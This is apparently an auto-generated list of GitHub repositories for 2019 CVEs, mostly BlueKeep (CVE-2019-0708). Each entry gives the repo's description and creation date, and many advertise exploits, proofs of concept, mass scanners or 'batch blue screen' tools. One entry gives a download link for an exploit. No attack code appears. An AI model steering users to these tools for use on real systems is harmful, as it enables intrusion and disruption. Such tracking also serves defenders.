**CVE-2019-0708** : [YSheldon/MS_T120](https://api.github.com/repos/YSheldon/MS_T120) create time: 2019-05-15T14:14:04Z

**PoC exploit for BlueKeep (CVE-2019-0708)** : [NullByteSuiteDevs/CVE-2019-0708](https://api.github.com/repos/NullByteSuiteDevs/CVE-2019-0708) create time: 2019-05-15T16:22:02Z

**None** : [infenet/CVE-2019-0708](https://api.github.com/repos/infenet/CVE-2019-0708) create time: 2019-05-15T19:11:03Z

**None** : [gildaaa/CVE-2019-0708](https://api.github.com/repos/gildaaa/CVE-2019-0708) create time: 2019-05-15T20:04:23Z

**Totally legitimate** : [n0auth/CVE-2019-0708](https://api.github.com/repos/n0auth/CVE-2019-0708) create time: 2019-05-15T19:53:34Z

**POCexp:https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8 ** : [sbkcbig/CVE-2019-0708-EXPloit](https://api.github.com/repos/sbkcbig/CVE-2019-0708-EXPloit) create time: 2019-05-15T13:49:09Z

**CVE-2019-0708 EXPloit-poc 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。 漏洞评级 CVE-2019-0708 严重 安全建议 1、针对Windows 7及Windows Server 2008的用户,及时安装官方安全补丁:https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175 2、针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 CVE-2019-0708 EXPloit-poc 影响版本 Windows7 XP Windows 2003 Windows Server 2008 Windows Server 2008 R2 EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-Poc-exploit](https://api.github.com/repos/sbkcbig/CVE-2019-0708-Poc-exploit) create time: 2019-05-15T20:26:34Z

**High level exploit** : [freeide/CVE-2019-0708](https://api.github.com/repos/freeide/CVE-2019-0708) create time: 2019-05-21T07:51:41Z

**None** : [HackerJ0e/CVE-2019-0708](https://api.github.com/repos/HackerJ0e/CVE-2019-0708) create time: 2019-05-15T22:03:28Z

**A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.** : [Barry-McCockiner/CVE-2019-0708](https://api.github.com/repos/Barry-McCockiner/CVE-2019-0708) create time: 2019-05-16T00:45:55Z

**A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.** : [ShadowBrokers-ExploitLeak/CVE-2019-0708](https://api.github.com/repos/ShadowBrokers-ExploitLeak/CVE-2019-0708) create time: 2019-05-16T00:56:58Z

**PoC about CVE-2019-0708 (RDP; Windows 7, Windows Server 2003, Windows Server 2008) ** : [syriusbughunt/CVE-2019-0708](https://api.github.com/repos/syriusbughunt/CVE-2019-0708) create time: 2019-05-16T00:34:23Z

**CVE-2019-0708 demo** : [safly/CVE-2019-0708](https://api.github.com/repos/safly/CVE-2019-0708) create time: 2019-05-16T09:55:25Z

**PoC for CVE-2019-6203, works on < iOS 12.2, macOS < 10.14.4** : [qingxp9/CVE-2019-6203-PoC](https://api.github.com/repos/qingxp9/CVE-2019-6203-PoC) create time: 2019-05-10T10:36:54Z

**getdirentriesattr kernel heap inofo leak** : [dothanthitiendiettiende/CVE-2019-6207](https://api.github.com/repos/dothanthitiendiettiende/CVE-2019-6207) create time: 2019-05-17T06:17:51Z

**POC for CVE-2019-0708** : [303sec/CVE-2019-0708](https://api.github.com/repos/303sec/CVE-2019-0708) create time: 2019-05-16T16:26:30Z

**(Wordpress) Ninja Forms File Uploads Extension <= 3.0.22 – Unauthenticated Arbitrary File Upload** : [KTN1990/CVE-2019-10869](https://api.github.com/repos/KTN1990/CVE-2019-10869) create time: 2019-05-12T08:20:16Z

**Win32k Elevation of Privilege Poc** : [ExpLife0011/CVE-2019-0803](https://api.github.com/repos/ExpLife0011/CVE-2019-0803) create time: 2019-05-17T11:05:22Z

**LOL** : [yushiro/CVE-2019-0708](https://api.github.com/repos/yushiro/CVE-2019-0708) create time: 2019-05-18T00:45:15Z

**Win32k Exploit by Grant Willcox** : [exodusintel/CVE-2019-0808](https://api.github.com/repos/exodusintel/CVE-2019-0808) create time: 2019-05-17T14:08:01Z

**CVE-2019-0708 Exploit** : [haoge8090/CVE-2019-0708](https://api.github.com/repos/haoge8090/CVE-2019-0708) create time: 2019-05-17T05:19:32Z

**It's only hitting vulnerable path in termdd.sys!!! NOT DOS** : [skyshell20082008/CVE-2019-0708-PoC-Hitting-Path](https://api.github.com/repos/skyshell20082008/CVE-2019-0708-PoC-Hitting-Path) create time: 2019-05-19T23:32:34Z

**eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE (CVE-2019-12185)** : [fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE](https://api.github.com/repos/fuzzlove/eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE) create time: 2019-05-18T23:56:52Z

**None** : [falconz/CVE-2019-12189](https://api.github.com/repos/falconz/CVE-2019-12189) create time: 2019-05-20T04:52:38Z

**CVE-2019-12189 - Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability** : [tuyenhva/CVE-2019-12189](https://api.github.com/repos/tuyenhva/CVE-2019-12189) create time: 2019-05-20T07:23:51Z

**CVE-2019-12190 - CentOS-WebPanel XSS vulnerability** : [tuyenhva/CVE-2019-12190](https://api.github.com/repos/tuyenhva/CVE-2019-12190) create time: 2019-05-20T08:09:49Z

**根据360的程序,整的CVE-2019-0708批量检测** : [edvacco/CVE-2019-0708-POC](https://api.github.com/repos/edvacco/CVE-2019-0708-POC) create time: 2019-05-21T10:34:21Z

**Kernel Stack info leak at exportObjectToClient function** : [maldiohead/CVE-2019-8540](https://api.github.com/repos/maldiohead/CVE-2019-8540) create time: 2019-05-17T04:07:14Z

**My bot (badly written) to search and monitor cve-2019-0708 repositories ** : [pry0cc/BlueKeepTracker](https://api.github.com/repos/pry0cc/BlueKeepTracker) create time: 2019-05-21T11:37:00Z

**None** : [zjw88282740/CVE-2019-0708-win7](https://api.github.com/repos/zjw88282740/CVE-2019-0708-win7) create time: 2019-05-21T13:16:49Z

**Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)** : [k8gege/CiscoExploit](https://api.github.com/repos/k8gege/CiscoExploit) create time: 2019-05-21T12:42:54Z

**CVE-2019-12252 Zoho ManageEngine ServiceDesk Plus < 10.5 Incorrect Access Control** : [tuyenhva/CVE-2019-12252](https://api.github.com/repos/tuyenhva/CVE-2019-12252) create time: 2019-05-21T16:59:23Z

**None** : [Jaky5155/cve-2019-0708-exp](https://api.github.com/repos/Jaky5155/cve-2019-0708-exp) create time: 2019-05-16T13:21:02Z

**cve-2019-0708 vulnerablility scanner** : [l9c/rdp0708scanner](https://api.github.com/repos/l9c/rdp0708scanner) create time: 2019-05-22T05:18:18Z

**Scan through given ip list** : [DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit](https://api.github.com/repos/DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit) create time: 2020-12-03T07:40:19Z

**CVE-2019-0708漏洞MSF批量巡检插件** : [blockchainguard/CVE-2019-0708](https://api.github.com/repos/blockchainguard/CVE-2019-0708) create time: 2019-05-17T03:25:42Z

**Check vuln CVE 2019-0708** : [SugiB3o/Check-vuln-CVE-2019-0708](https://api.github.com/repos/SugiB3o/Check-vuln-CVE-2019-0708) create time: 2019-05-23T07:47:29Z

**Exploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)** : [ruthlezs/ie11_vbscript_exploit](https://api.github.com/repos/ruthlezs/ie11_vbscript_exploit) create time: 2019-05-23T10:28:40Z

**None** : [CherishHair/CVE-2019-0232-EXP](https://api.github.com/repos/CherishHair/CVE-2019-0232-EXP) create time: 2019-05-23T05:44:29Z

**Goby support CVE-2019-0708 "BlueKeep" vulnerability check** : [gobysec/CVE-2019-0708](https://api.github.com/repos/gobysec/CVE-2019-0708) create time: 2019-05-23T13:54:24Z

**CVE-2019-0708 PoC Exploit** : [freeide/CVE-2019-0708-PoC-Exploit](https://api.github.com/repos/freeide/CVE-2019-0708-PoC-Exploit) create time: 2019-05-23T18:37:27Z

**Working proof of concept for CVE-2019-0708, spawns remote shell.** : [smallFunction/CVE-2019-0708-POC](https://api.github.com/repos/smallFunction/CVE-2019-0708-POC) create time: 2019-05-23T17:02:00Z

**a kernel information leak on macOS<= 10.14.4** : [maldiohead/CVE-2019-8627](https://api.github.com/repos/maldiohead/CVE-2019-8627) create time: 2019-05-17T02:40:39Z

**cve-2019-0708 poc .** : [closethe/CVE-2019-0708-POC](https://api.github.com/repos/closethe/CVE-2019-0708-POC) create time: 2019-05-24T07:40:05Z

**Darktrace CSRF exploit ** : [gerwout/CVE-2019-9596-and-CVE-2019-9597](https://api.github.com/repos/gerwout/CVE-2019-9596-and-CVE-2019-9597) create time: 2019-05-21T13:14:43Z

**None** : [pooooobi/CVE-2019-](https://api.github.com/repos/pooooobi/CVE-2019-) create time: 2019-05-26T11:30:10Z

**Exploit In Progress** : [qq431169079/CVE-2019-0709](https://api.github.com/repos/qq431169079/CVE-2019-0709) create time: 2019-05-31T04:23:39Z

**None** : [major203/cve-2019-0708-scan](https://api.github.com/repos/major203/cve-2019-0708-scan) create time: 2019-05-22T07:53:50Z

**根据360Vulcan Team开发的CVE-2019-0708单个IP检测工具构造了个批量检测脚本而已** : [herhe/CVE-2019-0708poc](https://api.github.com/repos/herhe/CVE-2019-0708poc) create time: 2019-05-22T03:10:14Z

**CVE-2019-0708** : [Rostelecom-CERT/bluekeepscan](https://api.github.com/repos/Rostelecom-CERT/bluekeepscan) create time: 2019-05-27T12:52:11Z

**Only Hitting PoC [Tested on Windows Server 2008 r2]** : [Leoid/CVE-2019-0708](https://api.github.com/repos/Leoid/CVE-2019-0708) create time: 2019-05-28T02:25:21Z

**sctp-PoC** : [butterflyhack/CVE-2019-8956](https://api.github.com/repos/butterflyhack/CVE-2019-8956) create time: 2019-05-28T07:09:17Z

**基于360公开的无损检测工具的可直接在windows上运行的批量检测程序** : [ht0Ruial/CVE-2019-0708Poc-BatchScanning](https://api.github.com/repos/ht0Ruial/CVE-2019-0708Poc-BatchScanning) create time: 2019-05-28T16:09:10Z

**PoC for CVE-2019-0708** : [f8al/CVE-2019-0708-POC](https://api.github.com/repos/f8al/CVE-2019-0708-POC) create time: 2019-05-16T20:30:36Z

**CVE-2019-0708 bluekeep 漏洞检测** : [oneoy/BlueKeep](https://api.github.com/repos/oneoy/BlueKeep) create time: 2019-05-29T01:08:55Z

**None** : [infiniti-team/CVE-2019-0708](https://api.github.com/repos/infiniti-team/CVE-2019-0708) create time: 2019-05-29T05:51:07Z

**CVE-2019-0708** : [blacksunwen/CVE-2019-0708](https://api.github.com/repos/blacksunwen/CVE-2019-0708) create time: 2019-05-15T17:56:22Z

**None** : [haishanzheng/CVE-2019-0708-generate-hosts](https://api.github.com/repos/haishanzheng/CVE-2019-0708-generate-hosts) create time: 2019-05-29T14:29:32Z

**A social experiment** : [adalenv/CVE-2019-0708-Tool](https://api.github.com/repos/adalenv/CVE-2019-0708-Tool) create time: 2019-05-23T15:08:30Z

**CVE-2019-0708 远程代码执行漏洞批量检测** : [biggerwing/CVE-2019-0708-poc](https://api.github.com/repos/biggerwing/CVE-2019-0708-poc) create time: 2019-05-21T05:38:54Z

**A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability. ** : [Gh0st0ne/rdpscan-BlueKeep](https://api.github.com/repos/Gh0st0ne/rdpscan-BlueKeep) create time: 2019-05-30T13:50:32Z

**CVE-2019-12460|Reflected XSS in WebPort-v1.19.1 impacts users who open a maliciously crafted link or third-party web page.** : [EmreOvunc/WebPort-v1.19.1-Reflected-XSS](https://api.github.com/repos/EmreOvunc/WebPort-v1.19.1-Reflected-XSS) create time: 2019-05-23T10:27:49Z

**CVE-2019-0708** : [UraSecTeam/CVE-2019-0708](https://api.github.com/repos/UraSecTeam/CVE-2019-0708) create time: 2019-05-30T08:59:49Z

**CVE-2019-0708 Exploit using Python** : [YHZX2013/CVE-2019-0709](https://api.github.com/repos/YHZX2013/CVE-2019-0709) create time: 2019-05-31T00:48:49Z

**None** : [JasonLOU/CVE-2019-0708](https://api.github.com/repos/JasonLOU/CVE-2019-0708) create time: 2019-05-31T02:28:23Z

**None** : [lp008/CVE_2019_0708_Blue_screen_poc](https://api.github.com/repos/lp008/CVE_2019_0708_Blue_screen_poc) create time: 2019-05-31T06:37:19Z

**蓝屏poc** : [shun-gg/CVE-2019-0708](https://api.github.com/repos/shun-gg/CVE-2019-0708) create time: 2019-05-31T07:35:26Z

**RDP POC** : [jiansiting/CVE-2019-0708](https://api.github.com/repos/jiansiting/CVE-2019-0708) create time: 2019-05-15T15:29:05Z

**dump** : [n1xbyte/CVE-2019-0708](https://api.github.com/repos/n1xbyte/CVE-2019-0708) create time: 2019-05-21T06:57:19Z

**ATutor 2.2.4 'Backup' Remote Command Execution (CVE-2019-12170)** : [fuzzlove/ATutor-Instructor-Backup-Arbitrary-File](https://api.github.com/repos/fuzzlove/ATutor-Instructor-Backup-Arbitrary-File) create time: 2019-05-13T06:01:47Z

**改写某大佬写的0708蓝屏脚本 改为网段批量蓝屏** : [Wileysec/CVE-2019-0708-Batch-Blue-Screen](https://api.github.com/repos/Wileysec/CVE-2019-0708-Batch-Blue-Screen) create time: 2019-06-06T03:49:26Z

**Vim/Neovim Arbitrary Code Execution via Modelines (CVE-2019-12735)** : [pcy190/ace-vim-neovim](https://api.github.com/repos/pcy190/ace-vim-neovim) create time: 2019-06-06T06:00:06Z

**None** : [CVCLabs/cve-2019-2725](https://api.github.com/repos/CVCLabs/cve-2019-2725) create time: 2019-06-06T19:27:09Z

**Python script to exploit confluence path traversal vulnerability cve-2019-3398** : [superevr/cve-2019-3398](https://api.github.com/repos/superevr/cve-2019-3398) create time: 2019-04-20T08:07:49Z

**ATutor 2.2.4 Arbitrary File Upload / RCE (CVE-2019-12169)** : [fuzzlove/ATutor-2.2.4-Language-Exploit](https://api.github.com/repos/fuzzlove/ATutor-2.2.4-Language-Exploit) create time: 2019-05-24T05:15:17Z

**Exploit for CVE-2019-11881 (Rancher 2.1.4 Web Parameter Tampering)** : [MauroEldritch/VanCleef](https://api.github.com/repos/MauroEldritch/VanCleef) create time: 2019-05-24T00:09:21Z

**None** : [welove88888/CVE-2019-2725](https://api.github.com/repos/welove88888/CVE-2019-2725) create time: 2019-06-11T00:49:56Z

**Source References for Published CVE & Advisory** : [yogeshshe1ke/CVE](https://api.github.com/repos/yogeshshe1ke/CVE) create time: 2019-02-12T05:31:45Z

**Announces fraud** : [ttsite/CVE-2019-0708-](https://api.github.com/repos/ttsite/CVE-2019-0708-) create time: 2019-05-20T04:23:58Z

**A fully automatic CVE-2019-0841 bypass targeting all versions of Edge in Windows 10.** : [0x00-0x00/CVE-2019-0841-BYPASS](https://api.github.com/repos/0x00-0x00/CVE-2019-0841-BYPASS) create time: 2019-06-11T20:05:26Z

**CVE-2019-0708-Msf-验证** : [cream-sec/CVE-2019-0708-Msf--](https://api.github.com/repos/cream-sec/CVE-2019-0708-Msf--) create time: 2019-06-12T03:37:39Z

**CVE-2019-XXXX | Dolibarr ERP 9.0.1 application has directory listing vulnerability. ** : [berkayipek/Dolibarr-ERP-CMS-Vulnerability](https://api.github.com/repos/berkayipek/Dolibarr-ERP-CMS-Vulnerability) create time: 2019-06-12T05:10:38Z

**Python script to detect bluekeep vulnerability (CVE-2019-0708) with TLS/SSL and x509 support** : [HynekPetrak/detect_bluekeep.py](https://api.github.com/repos/HynekPetrak/detect_bluekeep.py) create time: 2019-06-03T07:49:26Z

**CVE-2019-1064 Local Privilege Escalation Vulnerability** : [0x00-0x00/CVE-2019-1064](https://api.github.com/repos/0x00-0x00/CVE-2019-1064) create time: 2019-06-12T15:54:55Z

**CVE-2019-1064 Local Privilege Escalation Vulnerability** : [RythmStick/CVE-2019-1064](https://api.github.com/repos/RythmStick/CVE-2019-1064) create time: 2019-06-12T10:21:35Z

**3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)** : [k8gege/CVE-2019-0708](https://api.github.com/repos/k8gege/CVE-2019-0708) create time: 2019-05-15T15:01:38Z

**Anviz M3 RFID CVE-2019-11523 PoC** : [wizlab-it/anviz-m3-rfid-cve-2019-11523-poc](https://api.github.com/repos/wizlab-it/anviz-m3-rfid-cve-2019-11523-poc) create time: 2019-04-22T14:00:50Z

**CVE-2019-1064 - AppXSVC Local Privilege Escalation** : [attackgithub/CVE-2019-1064](https://api.github.com/repos/attackgithub/CVE-2019-1064) create time: 2019-06-16T09:31:11Z

**quick fix for CVE-2019-10149, works on Debian\Ubuntu\Centos** : [bananaphones/exim-rce-quickfix](https://api.github.com/repos/bananaphones/exim-rce-quickfix) create time: 2019-06-10T19:37:05Z

**Simple Bash shell quick fix CVE-2019-10149** : [aishee/CVE-2019-10149-quick](https://api.github.com/repos/aishee/CVE-2019-10149-quick) create time: 2019-06-14T14:02:43Z

**contains APIs created in Mar 2019 to view cve/epv reports names and content** : [anuragtr/fabric8-gemini-server-backup](https://api.github.com/repos/anuragtr/fabric8-gemini-server-backup) create time: 2019-06-15T12:40:50Z

**weblogic绕过和wls远程执行** : [jiansiting/CVE-2019-2725](https://api.github.com/repos/jiansiting/CVE-2019-2725) create time: 2019-06-15T12:51:19Z

**Security Research** : [padovah4ck/CVE-2019-0986](https://api.github.com/repos/padovah4ck/CVE-2019-0986) create time: 2019-03-21T13:58:25Z

**This repository will contain information regarding CVE-2019-12796 once it is made public.** : [PeterUpfold/CVE-2019-12796](https://api.github.com/repos/PeterUpfold/CVE-2019-12796) create time: 2019-06-17T15:47:12Z

**PoC for CVE-2019-10149, this vulnerability could be xploited betwen 4-87 to 4.91 version of Exim server.** : [MNEMO-CERT/PoC--CVE-2019-10149_Exim](https://api.github.com/repos/MNEMO-CERT/PoC--CVE-2019-10149_Exim) create time: 2019-06-13T23:21:53Z

**None** : [oldthree3/CVE-2019-12735-VIM-NEOVIM](https://api.github.com/repos/oldthree3/CVE-2019-12735-VIM-NEOVIM) create time: 2019-06-18T16:59:39Z

**Updated version for the tool UltraRealy with support of the CVE-2019-1040 exploit** : [lazaars/UltraRealy_with_CVE-2019-1040](https://api.github.com/repos/lazaars/UltraRealy_with_CVE-2019-1040) create time: 2019-06-19T08:32:31Z

**漏洞利用工具** : [wucj001/cve-2019-48814](https://api.github.com/repos/wucj001/cve-2019-48814) create time: 2019-04-28T03:24:47Z

**None** : [wdfcc/CVE-2019-0708](https://api.github.com/repos/wdfcc/CVE-2019-0708) create time: 2019-06-20T02:19:17Z

**CVE-2019-2725 bypass pocscan and exp ** : [kerlingcode/CVE-2019-2725](https://api.github.com/repos/kerlingcode/CVE-2019-2725) create time: 2019-06-16T06:17:09Z

**CVE-2019-2725命令回显+webshell上传+最新绕过** : [TopScrew/CVE-2019-2725](https://api.github.com/repos/TopScrew/CVE-2019-2725) create time: 2019-06-10T05:12:44Z

**A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability.** : [robertdavidgraham/rdpscan](https://api.github.com/repos/robertdavidgraham/rdpscan) create time: 2019-05-23T22:50:12Z

**POC CVE-2019-0708 with python script!** : [cvencoder/cve-2019-0708](https://api.github.com/repos/cvencoder/cve-2019-0708) create time: 2019-06-24T16:03:08Z

**Privesc through import of Sheduled tasks + Hardlinks - CVE-2019-1069** : [S3cur3Th1sSh1t/SharpPolarBear](https://api.github.com/repos/S3cur3Th1sSh1t/SharpPolarBear) create time: 2019-06-03T08:07:32Z

**CVE-2019-10149 privilege escalation** : [AzizMea/CVE-2019-10149-privilege-escalation](https://api.github.com/repos/AzizMea/CVE-2019-10149-privilege-escalation) create time: 2019-06-27T01:34:41Z

**CVE-2019-12949 ** : [tarantula-team/CVE-2019-12949](https://api.github.com/repos/tarantula-team/CVE-2019-12949) create time: 2019-06-25T03:22:23Z

**Proof of concept code for breaking out of docker via runC** : [RyanNgWH/CVE-2019-5736-POC](https://api.github.com/repos/RyanNgWH/CVE-2019-5736-POC) create time: 2019-06-30T13:42:14Z

**None** : [TrungNguyen1909/CVE-2019-6225-macOS](https://api.github.com/repos/TrungNguyen1909/CVE-2019-6225-macOS) create time: 2019-06-30T17:26:53Z

**This is a PoC for CVE-2019-12594, a vulnerability in DOSBox 0.74-2.** : [Alexandre-Bartel/CVE-2019-12594](https://api.github.com/repos/Alexandre-Bartel/CVE-2019-12594) create time: 2019-06-27T15:49:16Z

**Proof of concept tool to exploit the directory traversal and local file inclusion vulnerability that resides in the Sahi-pro web application CVE-2019-13063** : [0x6b7966/CVE-2019-13063-POC](https://api.github.com/repos/0x6b7966/CVE-2019-13063-POC) create time: 2019-07-15T09:45:36Z

**https://github.com/Yt1g3r/CVE-2019-3396_EXP.git** : [tanw923/test1](https://api.github.com/repos/tanw923/test1) create time: 2019-07-01T09:35:17Z

**Report fraud** : [ttsite/CVE-2019-0708](https://api.github.com/repos/ttsite/CVE-2019-0708) create time: 2019-05-21T04:00:49Z

**simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in /tmp/eximrce.** : [cowbe0x004/eximrce-CVE-2019-10149](https://api.github.com/repos/cowbe0x004/eximrce-CVE-2019-10149) create time: 2019-06-12T03:47:16Z

**CVE-2019-0708批量蓝屏恶搞** : [AdministratorGithub/CVE-2019-0708](https://api.github.com/repos/AdministratorGithub/CVE-2019-0708) create time: 2019-05-31T09:59:30Z

**PoC for CVE-2019-0888 - Use-After-Free in Windows ActiveX Data Objects (ADO)** : [sophoslabs/CVE-2019-0888](https://api.github.com/repos/sophoslabs/CVE-2019-0888) create time: 2019-06-21T22:26:52Z

**None** : [genknife/cve-2019-8513](https://api.github.com/repos/genknife/cve-2019-8513) create time: 2019-04-30T07:06:23Z

**None** : [genknife/cve-2019-8565](https://api.github.com/repos/genknife/cve-2019-8565) create time: 2019-05-05T07:34:05Z

**Exp of cve-2019-12272** : [HACHp1/LuCI_RCE_exp](https://api.github.com/repos/HACHp1/LuCI_RCE_exp) create time: 2019-07-04T04:54:36Z

**CVE-2019-0785** : [Jaky5155/CVE-2019-0785](https://api.github.com/repos/Jaky5155/CVE-2019-0785) create time: 2019-07-10T13:16:42Z

**Details for disclosing CVE-2019-13027** : [IckoGZ/CVE-2019-13027](https://api.github.com/repos/IckoGZ/CVE-2019-13027) create time: 2019-07-08T08:25:07Z

**R/W ** : [0x43434343/CVE-2019-0539](https://api.github.com/repos/0x43434343/CVE-2019-0539) create time: 2019-07-12T13:06:17Z

**CVE-2019-13403** : [B3Bo1d/CVE-2019-13403](https://api.github.com/repos/B3Bo1d/CVE-2019-13403) create time: 2019-07-14T05:52:01Z

**Html.Exploit.CVE_2019_0541** : [H4xl0r/CVE_2019_0541](https://api.github.com/repos/H4xl0r/CVE_2019_0541) create time: 2019-07-17T02:58:54Z

**Weblogic CVE-2019-2725 CVE-2019-2729 Getshell 命令执行 ** : [black-mirror/Weblogic](https://api.github.com/repos/black-mirror/Weblogic) create time: 2019-06-24T08:33:07Z

**Authenticated XSS in Microstrategy Web - Versions prior to 10.1 patch 10** : [undefinedmode/CVE-2019-12453](https://api.github.com/repos/undefinedmode/CVE-2019-12453) create time: 2019-07-15T14:17:10Z

**Stored XSS in MicroStrategy Web prior to 10.4.6** : [undefinedmode/CVE-2019-12475](https://api.github.com/repos/undefinedmode/CVE-2019-12475) create time: 2019-07-15T14:42:53Z

**CVE-2019-2618-自己编写** : [wsfengfan/CVE-2019-2618-](https://api.github.com/repos/wsfengfan/CVE-2019-2618-) create time: 2019-05-06T10:33:26Z

**CVE-2019-0708 Exploit Tool** : [cve-2019-0708-poc/cve-2019-0708](https://api.github.com/repos/cve-2019-0708-poc/cve-2019-0708) create time: 2019-07-18T08:41:01Z

**CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE** : [jas502n/CVE-2019-11580](https://api.github.com/repos/jas502n/CVE-2019-11580) create time: 2019-07-17T07:54:38Z

**A fix for CVE-2019-11358 (prototype pollution in jquery)** : [bitnesswise/jquery-prototype-pollution-fix](https://api.github.com/repos/bitnesswise/jquery-prototype-pollution-fix) create time: 2019-07-18T19:15:33Z

**Microsoft Edge Elevation of Privilege Vulnerability** : [c0d3G33k/CVE-2019-0678](https://api.github.com/repos/c0d3G33k/CVE-2019-0678) create time: 2019-07-19T11:55:32Z

**CVE‑2019‑5680** : [balika011/selfblow](https://api.github.com/repos/balika011/selfblow) create time: 2019-07-09T21:05:53Z

**Scripts for exploiting MSA-18-0020 (CVE-2018-16854) and MSA-19-0004 (CVE-2019-3847)** : [danielthatcher/moodle-login-csrf](https://api.github.com/repos/danielthatcher/moodle-login-csrf) create time: 2019-04-04T17:24:47Z

**None** : [sasqwatch/cve-2019-11477-poc](https://api.github.com/repos/sasqwatch/cve-2019-11477-poc) create time: 2019-07-22T20:23:08Z

**Atlassian JIRA Template injection vulnerability RCE** : [jas502n/CVE-2019-11581](https://api.github.com/repos/jas502n/CVE-2019-11581) create time: 2019-07-16T02:27:00Z

**Siemens TIA administrator Tool RCE** : [jiansiting/CVE-2019-10915](https://api.github.com/repos/jiansiting/CVE-2019-10915) create time: 2019-07-22T02:38:54Z

**Jackson Rce For CVE-2019-12384 ** : [jas502n/CVE-2019-12384](https://api.github.com/repos/jas502n/CVE-2019-12384) create time: 2019-07-24T07:12:14Z

**收集网上CVE-2018-0708的poc和exp(目前没有找到exp)** : [ntkernel0/CVE-2019-0708](https://api.github.com/repos/ntkernel0/CVE-2019-0708) create time: 2019-07-25T01:05:21Z

**None** : [CrackerCat/cve-2019-1096-poc](https://api.github.com/repos/CrackerCat/cve-2019-1096-poc) create time: 2019-07-25T07:58:44Z

**None** : [ze0r/CVE-2019-0708-exp](https://api.github.com/repos/ze0r/CVE-2019-0708-exp) create time: 2019-07-04T01:49:22Z

**None** : [infiniteLoopers/CVE-2019-2107](https://api.github.com/repos/infiniteLoopers/CVE-2019-2107) create time: 2019-07-27T19:03:27Z

**Some debug notes and exploit(not blind)** : [verctor/nexus_rce_CVE-2019-7238](https://api.github.com/repos/verctor/nexus_rce_CVE-2019-7238) create time: 2019-07-26T16:08:40Z

**PoC for CVE-2019-10207** : [butterflyhack/CVE-2019-10207](https://api.github.com/repos/butterflyhack/CVE-2019-10207) create time: 2019-07-30T08:39:21Z

**CVE-2019-1132** : [petercc/CVE-2019-1132](https://api.github.com/repos/petercc/CVE-2019-1132) create time: 2019-07-31T02:30:28Z

**The exploit for CVE-2019-13272** : [Cyc1eC/CVE-2019-13272](https://api.github.com/repos/Cyc1eC/CVE-2019-13272) create time: 2019-07-31T06:36:21Z

**Jackson-databind RCE** : [jas502n/CVE-2019-14439](https://api.github.com/repos/jas502n/CVE-2019-14439) create time: 2019-08-01T05:33:06Z

**Remote code execution in Atlassian Jira(CVE-2019–11581) through template engine FreeMaker** : [r0hack/RCE-in-Jira](https://api.github.com/repos/r0hack/RCE-in-Jira) create time: 2019-07-16T16:04:59Z

**Linux 4.10 < 5.1.17 PTRACE_TRACEME local root** : [jas502n/CVE-2019-13272](https://api.github.com/repos/jas502n/CVE-2019-13272) create time: 2019-07-31T04:51:43Z

**None** : [Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548](https://api.github.com/repos/Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548) create time: 2019-08-01T08:25:53Z

**CVE-2019-7839** : [securifera/CVE-2019-7839](https://api.github.com/repos/securifera/CVE-2019-7839) create time: 2019-08-03T05:39:22Z

**提权漏洞** : [bigbigliang-malwarebenchmark/cve-2019-13272](https://api.github.com/repos/bigbigliang-malwarebenchmark/cve-2019-13272) create time: 2019-08-04T06:51:36Z

**None** : [solomolo/CVe-2019](https://api.github.com/repos/solomolo/CVe-2019) create time: 2019-08-04T08:44:26Z

**None** : [Lee-SungYoung/cve-2019-5736-study](https://api.github.com/repos/Lee-SungYoung/cve-2019-5736-study) create time: 2019-08-05T10:15:52Z

**Exim Honey Pot for CVE-2019-10149 exploit attempts.** : [Brets0150/StickyExim](https://api.github.com/repos/Brets0150/StickyExim) create time: 2019-07-25T00:46:37Z

**linux 提权** : [oneoy/CVE-2019-13272](https://api.github.com/repos/oneoy/CVE-2019-13272) create time: 2019-08-07T01:21:26Z

**:unlock: transfer ownership of any FB50 smart lock to yourself (CVE-2019-13143)** : [securelayer7/pwnfb50](https://api.github.com/repos/securelayer7/pwnfb50) create time: 2019-08-05T15:45:02Z

**CVE-2019-14537 PoC** : [Wocanilo/CVE-2019-14537](https://api.github.com/repos/Wocanilo/CVE-2019-14537) create time: 2019-08-07T11:25:39Z

**CVE-2019-2725 命令回显** : [lufeirider/CVE-2019-2725](https://api.github.com/repos/lufeirider/CVE-2019-2725) create time: 2019-05-29T01:57:05Z

